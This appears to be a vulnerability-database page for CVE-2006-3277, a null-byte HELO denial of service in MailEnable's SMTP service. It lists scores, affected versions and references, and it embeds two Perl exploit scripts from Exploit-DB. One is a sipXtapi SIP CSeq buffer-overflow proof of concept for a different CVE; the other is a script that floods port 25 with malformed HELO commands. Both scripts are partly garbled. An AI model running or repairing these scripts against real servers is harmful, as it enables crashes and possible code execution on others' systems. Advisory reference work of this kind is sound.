CVE-2006-3277
Published 2006-06-28
Priority: P4 · 22
Severity: medium · 5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 6.00% (92.4th percentile)
The SMTP service of MailEnable Standard 1.92 and earlier, Professional 2.0 and earlier, and Enterprise 2.0 and earlier before the MESMTPC hotfix, allows remote attackers to cause a denial of service (application crash) via a HELO command with a null byte in the argument, possibly triggering a length inconsistency or a missing argument.
Affected
73 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mailenable | mailenable_enterprise | <= 1.00 | — |
| mailenable | mailenable_enterprise | <= 1.01 | — |
| mailenable | mailenable_enterprise | <= 1.1 | — |
| mailenable | mailenable_enterprise | <= 1.2 | — |
| mailenable | mailenable_enterprise | <= 1.02 | — |
| mailenable | mailenable_enterprise | <= 1.03 | — |
| mailenable | mailenable_enterprise | <= 1.04 | — |
| mailenable | mailenable_enterprise | <= 1.21 | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
No detection rules found.
Exploit-DB
SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
exploitdb·2006-07-10
CVE-2006-3524 SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow (PoC)
---
```perl
#!/usr/bin/perl
# PoC Exploit By [email protected]
# Remote Buffer Overflow in sipXtapi
use IO::Socket;
#use strict;
print "sipXtapi Exploit by Michael Thumann \n\n";
if (not $ARGV[0]) {
print "Usage: sipx.pl \n";
exit;}
$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: \r
\r
END
print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target)
```
Exploit-DB
MailEnable 1.x - SMTP 'HELO' Remote Denial of Service
exploitdb·2006-06-24
CVE-2006-3277 MailEnable 1.x - SMTP 'HELO' Remote Denial of Service
---
source: https://www.securityfocus.com/bid/18630/info
MailEnable is prone to a remote denial-of-service vulnerability.
This issue allows remote attackers to crash the application, denying further service to legitimate users.
```perl
#!/usr/bin/perl -w
#
# Mailenable SMTP DoS exploit
# 24/06/2006
#
# Filbert at divisionbyzero dot be
#
use Net::Telnet;
$string = "\0x99";
for ($count = 1; $count 60, Errmode=>'return',Port=>'25');
$telnet->open($ARGV[0]);
$telnet->print("helo ", $string, "\n");
}
```
No writeups or analysis indexed.
- http://secunia.com/advisories/20790
- http://securitytracker.com/id?1016376
- http://www.divisionbyzero.be/?p=173
- http://www.divisionbyzero.be/?p=174
- http://www.mailenable.com/hotfix/mesmtpc.zip
- http://www.osvdb.org/26791
- http://www.securityfocus.com/archive/1/438374/100/0/threaded
- http://www.securityfocus.com/bid/18630
- http://www.vupen.com/english/advisories/2006/2520
- https://exchange.xforce.ibmcloud.com/vulnerabilities/27387